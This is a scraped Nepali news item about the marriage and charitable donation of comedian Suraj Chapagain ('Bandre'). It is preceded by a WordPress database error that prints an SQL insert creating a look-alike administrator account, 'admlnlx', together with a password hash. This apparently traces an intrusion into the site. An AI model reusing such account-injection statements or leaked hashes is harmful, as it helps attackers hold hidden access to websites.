WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaOZNos0vDQY66.MKf.dX0GdkTH0BL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 19:35:56', '', 'admlnlx', 'admlnlx')
चितवन,पुस १-
नेपाली हाँस्यटेलिसिरियल मेरी बास्सैमा बान्द्रेको भूमिकाबाट चर्चित बनेका कलाकार सुरज चापागाईँ बैवाहिक जीवनमा बाँधिएका छन् ।उनले काठमाण्डौ चण्डौलकी उषासँग बैवाहिक जीवनलाई शुरु गरेका हुन् । उनिहरु विगत १ बर्षदेखी प्रेममा थिए ।
उषाले अध्यापन गर्ने एक विद्यालयमा कार्यक्रमको लागि पुगेका बान्द्रेले उषालाई भेटेका थिए । त्यसको केहि समयपछि फेसबुकबाट प्रेम शुरु भएको थियो ।सुरजले एक अनाथ आश्रमलाई ५० हजार रकम पनि प्रदान गरेका छन् । आफ्नो बिवाहको खर्च कम गरी त्यहिँबाट बचत गरेर उनले ४० जना बच्चाको भबिष्यको लागि प्रदान गरेका हुन् ।
हामीले तपाईँलाई आज बान्द्रे र उनकी श्रीमतीसँग पार्टीमा नै गरिएको भिडियो कुराकानी प्रस्तुत गर्दैछौँ ।
भिडियो हेर्नुहोस्ः